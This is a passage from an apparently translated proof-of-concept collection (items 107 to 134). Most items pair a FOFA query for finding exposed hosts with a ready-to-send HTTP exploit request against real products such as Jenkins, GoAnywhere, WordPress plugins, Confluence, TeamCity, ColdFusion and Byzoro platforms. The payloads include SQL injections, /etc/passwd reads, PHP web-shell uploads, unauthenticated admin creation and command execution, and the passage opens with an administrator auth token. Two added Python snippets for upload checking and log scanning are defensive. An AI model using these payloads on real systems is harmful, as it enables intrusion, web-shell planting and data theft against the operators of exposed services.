Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with a token valid for the target>
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
The web-upload handler fetches the url parameter server-side; a request from the D-Tale host to the DNS-log name confirms the SSRF.
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
Two requests share one Session id: the "upload" side carries the CLI arguments and the "download" side returns the command output (open the download side first, or run both in parallel, so that the output has somewhere to go). The argument @/etc/passwd is expanded by the args4j option parser into the file's contents, which then leak through the help command's error message. The upload body below is written as a Python bytes literal; the raw body is 57 bytes.
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 57

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


Output returned on the download side. The first line of /etc/passwd becomes the COMMAND argument of help and the second line triggers the "Too many arguments" error, so two lines of the file are disclosed per request:
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
The ..;/ segment bypasses the path-based access check in front of the initial-setup wizard. A 200 response that renders the InitialAccountSetup form means an administrator account can be created without authentication; a patched instance does not serve the wizard.
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the home page and take the nonce from the page source (Bricks prints it in its front-end script data as the nonce field). This nonce is all the render_element endpoint checks, so no login is needed.
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: put that nonce into the request below. The queryEditor string is evaluated as PHP; throwing the captured command output as an exception returns it in the response.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
The support_custom_img field is saved with the client-supplied filename, so a .php name is written as-is. The body as it circulates omits the blank line between each part's headers and its value, which the multipart parser requires; it is shown corrected here, with the file content as PAYLOAD.
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

PAYLOAD
----------767099171--


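Several of the upload POCs in this list (items 93, 94, 100 and 116, and the Byzoro items further down) are multipart/form-data requests, and the js-support-ticket body as it circulates is missing the blank line that separates each part's headers from its value. The following Python is an added example (not code from the source post or from any of the products) that builds a spec-conformant body, parses one back, and flags file parts whose filename carries a server-side script extension, which is the check a defender would put in front of an upload endpoint. The part list for item 93 is reconstructed from the request shown above; the risky-extension list is an assumption.

```python
import re

# Part list reconstructed from item 93 above (SecGate 3600 app_av_import_save).
# Two-tuples are text fields, four-tuples are file parts.
SECGATE_PARTS = [
    ("MAX_FILE_SIZE", "10000000"),
    ("upfile", "xlskxknxa.txt", "text/plain", b"wagletqrkwrddkthtulxsqrphulnknxa"),
    ("submit_post", "obj_app_upfile"),
    ("__hash__", "0b9d6b1ab7479ab69d9f71b05e0e9445"),
]

# Extensions a legitimate upload to these endpoints should never carry (assumed list).
RISKY_EXT = (".php", ".phtml", ".php5", ".jsp", ".jspx", ".asp", ".aspx", ".cgi", ".sh")


def build_multipart(parts, boundary):
    """Return (Content-Type header value, body bytes) for PARTS.

    Every part is: delimiter line, header line(s), one empty line, the value.
    Lines are CRLF-separated and the body ends with the closing delimiter.
    """
    delim = b"--" + boundary.encode()
    lines = []
    for part in parts:
        lines.append(delim)
        if len(part) == 2:
            name, value = part
            lines += [f'Content-Disposition: form-data; name="{name}"'.encode(), b"", value.encode()]
        else:
            name, filename, ctype, data = part
            lines += [
                f'Content-Disposition: form-data; name="{name}"; filename="{filename}"'.encode(),
                f"Content-Type: {ctype}".encode(),
                b"",
                data,
            ]
    lines += [delim + b"--", b""]
    return f"multipart/form-data; boundary={boundary}", b"\r\n".join(lines)


def parse_multipart(body, boundary):
    """Split BODY into (name, filename, data) tuples; filename is None for text fields."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:        # [0] is the preamble before the first delimiter
        if chunk.startswith(b"--"):            # "--boundary--" closes the body
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):
            data = data[:-2]
        disp = head.decode("latin-1")
        name = re.search(r'[; ]name="([^"]*)"', disp)      # not the "name" inside "filename"
        fname = re.search(r'filename="([^"]*)"', disp)
        parts.append((name.group(1) if name else None, fname.group(1) if fname else None, data))
    return parts


def risky_uploads(parts):
    """File parts whose filename ends in a server-side script extension."""
    return [(name, fname) for name, fname, _ in parts
            if fname and fname.lower().endswith(RISKY_EXT)]


if __name__ == "__main__":
    ctype, body = build_multipart(SECGATE_PARTS, "----WebKitFormBoundarykcbkgdfx")
    print(ctype, "Content-Length:", len(body))
    print(risky_uploads(parse_multipart(body, "----WebKitFormBoundarykcbkgdfx")))
```

len(body) is the Content-Length to send, which is where the mismatched lengths in several of the copied POCs come from. The parser is deliberately simple (no nested multipart, no quoted-string escapes in the filename); a filename check on its own is a weak control, the stronger fix for every endpoint in this list is server-side renaming and storing uploads outside the web root.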
117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


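This collection is meant for defenders to check their own exposure, and most of the requests above leave a distinctive request line in web-server logs. The following Python is an added example (not code from the source post) that runs a handful of signatures derived from items 93 to 115 over access-log lines in the common combined format. The sample lines are constructed (documentation IP ranges, not real traffic), the rules match the percent-decoded request target and are deliberately narrow, and the item numbers in the rule names refer to this list.

```python
import re
from urllib.parse import unquote

# Combined/NCSA access-log line: ip - - [time] "METHOD target HTTP/x" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is applied to "METHOD " + percent-decoded request target.
RULES = [
    ("SecGate 3600 unauthenticated upload (items 93/94)",
     re.compile(r"^POST /\?g=(app_av|obj_area)_import_save")),
    ("Apache OFBiz requirePasswordChange bypass (items 95/96)",
     re.compile(r"^POST /webtools/control/(xmlrpc|ProgramExport)\b.*requirePasswordChange=Y")),
    ("Ivanti CVE-2024-21887 keys-status injection (item 101)",
     re.compile(r"^GET /api/v1/totp/user-backup-code/\.\./\.\./license/keys-status/;")),
    ("Ivanti SAML endpoints CVE-2024-21893 / CVE-2024-22024 (items 102/103)",
     re.compile(r"^POST /(dana-ws/saml20\.ws|dana-na/auth/saml-sso\.cgi)")),
    ("Jenkins CLI over HTTP CVE-2024-23897 (item 109)",
     re.compile(r"^POST /cli\?remoting=false")),
    ("GoAnywhere MFT CVE-2024-0204 setup wizard (item 110)",
     re.compile(r"^GET /goanywhere/.*\.\.;/wizard/InitialAccountSetup\.xhtml")),
    ("WP Automatic CVE-2024-27954 file download (item 113)",
     re.compile(r"wp_automatic=download&.*link=file:")),
    ("Bricks Builder CVE-2024-25600 render_element (item 115)",
     re.compile(r"^POST /wp-json/bricks/v1/render_element")),
]


def scan_log(lines):
    """Return (client_ip, rule_name) for every line that trips a rule, in input order."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not an access-log line we understand
        probe = m["method"] + " " + unquote(m["target"])
        for name, rx in RULES:
            if rx.search(probe):
                hits.append((m["ip"], name))
    return hits


# Constructed sample lines modelled on the requests in items 96, 101, 109, 110 and 113.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Jun/2024:10:01:02 +0800] "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.5 - - [02/Jun/2024:10:01:09 +0800] "GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Jun/2024:10:02:00 +0800] "POST /cli?remoting=false HTTP/1.1" 200 1024 "-" "python-requests/2.31"',
    '198.51.100.7 - - [02/Jun/2024:10:02:30 +0800] "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [02/Jun/2024:10:03:00 +0800] "GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [02/Jun/2024:10:03:05 +0800] "GET /wp-login.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for ip, rule in scan_log(SAMPLE_LOG):
        print(ip, "->", rule)
```

Run it against the raw request field of the log; if a reverse proxy normalises .. or ;, before logging, the Ivanti and GoAnywhere rules will not see the traversal and should be keyed on the target path only. A hit is a triage lead, not a confirmation: check the response status, whether the host actually runs the product, and the version before treating it as an incident.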
118. Beijing Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
The txt_path field controls the destination, so the uploaded content is written to /home/src.php regardless of the original filename.
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then request /home/src.php and pass the command in the passwd POST parameter.

119. Beijing Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin. The id parameter is concatenated into the query, so the time-based payload below delays the response by 5 seconds when the database name is 3 characters long.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Byzoro Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


The uploaded file is written to /upload/2.php.

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328


boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; the decoded value is sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close


123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))


124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>


http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc


Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!


After the user is created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--



128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9


130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--


131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}


CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp


CVE-2024-27198-RCE.py

133. H5 cloud mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--



134. Netentsec NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

